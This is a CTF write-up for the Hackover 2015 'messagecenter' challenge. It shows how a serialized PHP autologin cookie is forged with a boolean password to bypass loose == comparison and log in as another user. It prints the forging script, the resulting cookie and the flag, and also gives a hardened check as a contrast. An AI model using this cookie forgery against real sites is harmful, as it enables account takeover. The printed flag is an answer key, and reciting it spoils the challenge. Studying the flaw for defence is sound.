Hackover CTF 2015 – messagecenter

This writeup describes the solution for the messagecenter challenge in Hackover CTF 2015 held by Chaos Computer Club Hamburg.

Hackover CTF 2015 - Messagecenter - Task description

The task was … to find the flag … as usual :D. So let's look at the website.

Hackover CTF 2015 - Messagecenter - Website

So we get a simple website with login fields and some information (demo login data, more usernames, etc.). When logging in with the “demo” account and the “remember me” option we get this view:

Hackover CTF 2015 - Messagecenter - Login view

Nothing special: you can read and write messages. The website is vulnerable to Cross-Site Scripting, but apart from other contestants' sessions there is no admin, alice, bob or other interesting session id to steal. So this is not the way to the flag. Let's look at the cookie data now.

Hackover CTF 2015 - Messagecenter - Cookie data

There is the PHP session id (PHPSESSID) and a second cookie that only exists when the “remember me” checkbox was used at login. At first glance it looks like URL-encoded serialized data. Let's check this using a small PHP script.


  <?php
  // the autologin cookie value as copied from the browser
  $cookie = "a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22password%22%3Bs%3A40%3A%2289e495e7941cf9e40e6980d14a16bf023ccd4c91%22%3B%7D";

  // undo the URL encoding, then deserialize and dump the result
  $data = unserialize(urldecode($cookie));
  var_dump($data);


When executing…

ruport@zentaur:~/hackover2015$ php cookie.php 
array(2) {
  ["username"]=>
  string(4) "demo"
  ["password"]=>
  string(40) "89e495e7941cf9e40e6980d14a16bf023ccd4c91"
}

Alright, the username and the password hash are stored directly in the autologin cookie; the password is a 40-character hex string, the length of a SHA-1 digest. Let's think about what the server does with this data. Presumably it unserializes the cookie and checks the username and password against a database. As we all know, PHP comparison is not type-safe when the simple == is used instead of ===.

If the server uses the loose comparison, changing the password in the cookie from a string to the boolean true would allow logging in as any user: with ==, PHP converts the other operand to boolean, and any non-empty string (such as a stored hash) compares equal to true. Let's test this and write a small PHP script to prepare such a cookie.
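To make the type-juggling bypass concrete, here is an added example (not code from the original writeup or the challenge server) that models the autologin check in its loose and strict forms. The user table, the use of sha1 for the stored hash and the function names are assumptions; the real server code was not available.

```php
<?php
// Added example: a minimal model of an autologin cookie check.
// Assumption: passwords are stored as sha1 hex digests (40 chars, matching the
// length of the hash seen in the demo cookie). Constructed user table.
$users = [
    'demo'  => sha1('demo'),
    'Alice' => sha1('not-the-real-password'),
];

// Vulnerable check: loose comparison. A boolean true in the cookie compares
// equal to any non-empty string, so the stored hash is never really checked.
function autologin_loose(array $users, string $cookie): ?string {
    $data = unserialize(urldecode($cookie));
    if (!is_array($data) || !isset($data['username']) || !isset($users[$data['username']])) {
        return null;
    }
    if ($users[$data['username']] == $data['password']) {   // == juggles types
        return $data['username'];
    }
    return null;
}

// Hardened check: refuse non-string fields, compare with hash_equals (strict
// and constant-time), and forbid object instantiation from untrusted data.
function autologin_strict(array $users, string $cookie): ?string {
    $data = unserialize(urldecode($cookie), ['allowed_classes' => false]);
    if (!is_array($data)
        || !isset($data['username'], $data['password'])
        || !is_string($data['username'])
        || !is_string($data['password'])
        || !isset($users[$data['username']])) {
        return null;
    }
    if (hash_equals($users[$data['username']], $data['password'])) {
        return $data['username'];
    }
    return null;
}

// Constructed cookies: a forged one with a boolean password, and a legitimate one.
$forged = urlencode(serialize(['username' => 'Alice', 'password' => true]));
$legit  = urlencode(serialize(['username' => 'demo', 'password' => sha1('demo')]));

var_dump(autologin_loose($users, $forged));
var_dump(autologin_strict($users, $forged));
var_dump(autologin_strict($users, $legit));
```

Run with php, the loose check accepts the forged cookie and returns "Alice", while the strict check rejects it and only accepts the legitimate demo cookie. Note that the type checks matter independently of ===: hash_equals throws on non-string arguments, and the allowed_classes option closes the separate object-injection risk of unserializing attacker-controlled cookie data.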


  <?php
  // forge an autologin cookie with a boolean instead of a password hash
  $data = array('username' => "Alice", 'password' => True);

  $cookie = serialize($data);

  // URL-encode it so it can be pasted into the browser's cookie store
  print urlencode($cookie);


The output after execution is:

ruport@zentaur:~/hackover2015$ php messagecenter.php 
a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22Alice%22%3Bs%3A8%3A%22password%22%3Bb%3A1%3B%7D

After putting this new autologin cookie into the browser and refreshing the website we get a “very important” message in Alice's inbox:

Hackover CTF 2015 - Messagecenter - Solution

The solution is “hackover15{typeSafetyToTheRescue}”.
